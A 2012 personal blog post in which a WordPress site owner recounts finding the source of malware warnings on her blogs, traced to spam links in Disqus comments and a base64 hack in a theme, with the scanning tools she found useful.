WordPress infected with javascript malware – FIX

On 7 December, 2012 by Carol

Update 2 Fixed at last:

I think being stubborn and not accepting a defeat regarding a possibly hacked/hijacked website is a good quality to have and i am stubborn.

Time and time again i thought i found the fix, but on scan my blogs were displaying the same links.
I then scanned my links with http://jsunpack.jeek.org and i got a bunch of decoded code back and i could see that there were links being displayed, same links caught as malware,  and this is an example of what i had:

Capture hidden code 1024x161 Wordpress infected with javascript malware   FIX

 

 

But where on Earth was its location? I could see it, but i couldn’t find and remove it.

I removed my current themes and installed a default WP theme. Did the scan with http://www.unmaskparasites.com/ (you can have a fresh scan after 1 hour) and http://jsunpack.jeek.org .  The bastard was still there and I was so pissed.
Sucuri wasn’t reliable anymore because i had to push the scan a few times to show me a result: 5 times clean, 1 time infected.
So, it wasn’t the theme.
I checked almost all the wp php files, theme files, looked for weird named files, the database. Nothing. At this point i felt like pulling my hair off.

On the tens of websites i looked, everyone was pointing to the same: backup, fix your passwords, reinstall WP.
Or, what i mainly saw was: Go to Sucuri and let them remove that for you for a fee.
No problem, but if they can do it, i can do it too or at least i can try.

So i refused to believe that this was a one way thing and only the experts at Sucuri could help me and tried a different approach to isolate and see if the bad code was in my posts or in the WP files and i did the following:

1) An export of my posts and pages only via my dashboard + a copy of my Uploads on the wp-content folder (just in case i might have to reinstall WP).
2) Created an extra subdomain via my cPanel.
3) Installed via Scriptaculous a new WordPress on that subdomain (my host has a ton of goodies).
4) Imported my posts and pages to the new subdomain.
5) Checked with the 2 jsunpack.jeek.org  and unmaskparasites.com. Clean!

Plugins ‹ Ramblings about Life and Politics — WordPress 2012 12 10 12 53 57 214x300 Wordpress infected with javascript malware   FIXI repeated the steps with my Politics blog. Scanned. Clean.
This time i did step 6 on my test subdomain.
Installed a few plugins. Scanned. Infected! Son of a biscuit!Capture code embed 1024x61 Wordpress infected with javascript malware   FIX

 

It was late, so i had to call it quit once more.

This morning i picked up from where i left it and i discovered something by mistake.
I was messing with the plugins on my main blog and saw that my Disqus plugin was not showing on the posts.
I looked into the dashboard and – call it attention span, luck or whatever – i jumped to the comments and started removing the spam ones. And what do you know? All the links appearing on my blog that have been flagged as malware were coming from the inserted links into the Disqus comments and looking at their names, they were the same ones appearing on my blog’s code.
I immediately deleted them and changed the link posting setting on Disqus to “Comments containing links must be approved before they are published.”. Then I ran a scan without Disqus and bam! Clean.

The thing is that Disqus inserts a code into the WordPress footer , so i guess that’s why i got all this crap.

Conclusion:

My original finding that my problem was coming from the plugins was partially correct but i didn’t look further and deeper into it.
Instead, i hunted for something that it was not even there.
Is true that one of my themes contained a bad hack –base64_– but i had that theme for a long time and for some odd reason, i never had problems with it.
My blogs are now clean and i couldn’t be happier.

If that happens to you then follow the 6 steps i did to isolate and see where the infected files might be.
Once you have, check the plugins one by one. If you use Disqus, check the comments for spam that hasn’t been caught yet.
If you have links displayed like i did, then is probably not a hack. A scan with the links provided in this post should help you see that.

If the code is in a file or in a post like i had it once before, then unmaskparasites.com will point you to that file. It will also help you recognize your links or at least legit links on your website.
If not, then you are dealing with hidden ads or like me, spam comments, making it very difficult to look in the right places.

Reliable (helpful) tools in this order:

  1. unmaskparasites.com
  2. jsunpack.jeek.org
  3. THEME AUTHENTICITY CHECKER  (TAC)
  4. quttera.com
  5. sitecheck.sucuri.net/scanner

As for the steps to take…well. It all depends on your problem and your website’s security.
Just make sure you have a backup, just in case things go bad.

 

–End of update 2–

Update 1:
I was a bit …enthusiastic about disabling the plugins and so i had to do some further search and i found something.

If disabling the plugins doesn’t help, then i suggest installing THEME AUTHENTICITY CHECKER  (TAC) and let it scan the installed themes for bad code.
This is what i found. My themes contained a bad code, the same code that i was hunting for to remove the malware from this blog.
Once you find the bad theme, remove it and check again with TAC and then with SUCURI.
Click to enlarge.
Capture code 300x138 Wordpress infected with javascript malware   FIX

You might also want to scan your link with http://quttera.com/ and see if there are scripts that will need to be deleted.

—–

Early yesterday i logged into my WordPress dashboard to write a post and i saw that there were a few plugins needing to be updated.
Without even looking which ones required the update, i just hit the button and it updated them.
Then i accessed my blog only to have a warning from my antivirus that there is a malware infection on my blog.
The weird thing is that right before i updated the plugins, my blog was just fine, but i really didn’t think about the updates i had just done.
There are 2 websites that are really useful in such a situation and these are:
http://sitecheck.sucuri.net/scanner/
http://www.unmaskparasites.com/

They both scan websites for malware and can be useful. But don’t be fooled.
The first one displays the javascript malware and the second one displays all scripts, so you really need to find the rest on your own..
Nevertheless, they are both very helpful.

This is what i got with Sucuri:

A9d44pBCUAASCvN.jpg large 150x150 Wordpress infected with javascript malware   FIX

And so ,terrified at the thought that i might get my visitors infected, i started googling the issue. I have seen so many websites, all advising the same: check this,

check that, run an SQL search…And so i did them all and nothing helped.

Hours and hours looking and checking, installing new security plugins, scanning and every time, after thinking i fixed it and refreshed the cache, i got the same warning.
It frustrated the daylights out of me and finally, at 2 am i called it quit.

At 10 this morning i start my search again.
Nobody, from all the links i’ve visited gives a clear explanation. It just seems a big maybe and they will all eventually advise you to backup, remove everything and reinstall WordPress.

My advice to you is DON’T do that just yet. Not until you understand if you have been hacked or if it is a plugin code injection.

As it turns out, it was one of my plugins causing that and even though i don’t know – for now – which one is the cause, i will find it.

The fix:
If you get a warning that your WordPress is infected, go to http://sitecheck.sucuri.net/scanner/  and and do a scan.
If you get something similar to my shot above (the link will probably be different), then go to your active plugins and bulk disable all.
In my case, i left 3 active. Wordfence security is still running a scan, and because i installed it after i got the issue, it couldn’t have been it.
Dunno why i left the other 2 on though….

Plugins ‹ Carol’s Vault — WordPress 2012 12 07 15 01 36 150x150 Wordpress infected with javascript malware   FIX
Click on the image to enlarge

Anyway…
After disabling all the others, i went to http://sitecheck.sucuri.net/scanner/  and scanned again and this time it came back clean.
Capture clean 150x150 Wordpress infected with javascript malware   FIX
Click on the image to enlarge

Yesterday i thought i got hacked and i was this close to go through some  high amount of work to reinstall WP only to find out that it was one of my plugins injecting code.

I am now left with 42 plugins to check and see which one misbehaves.
Plugins ‹ Carol’s Vault — WordPress 2012 12 07 15 08 14 150x150 Wordpress infected with javascript malware   FIX

Hope this helped!

%d bloggers like this: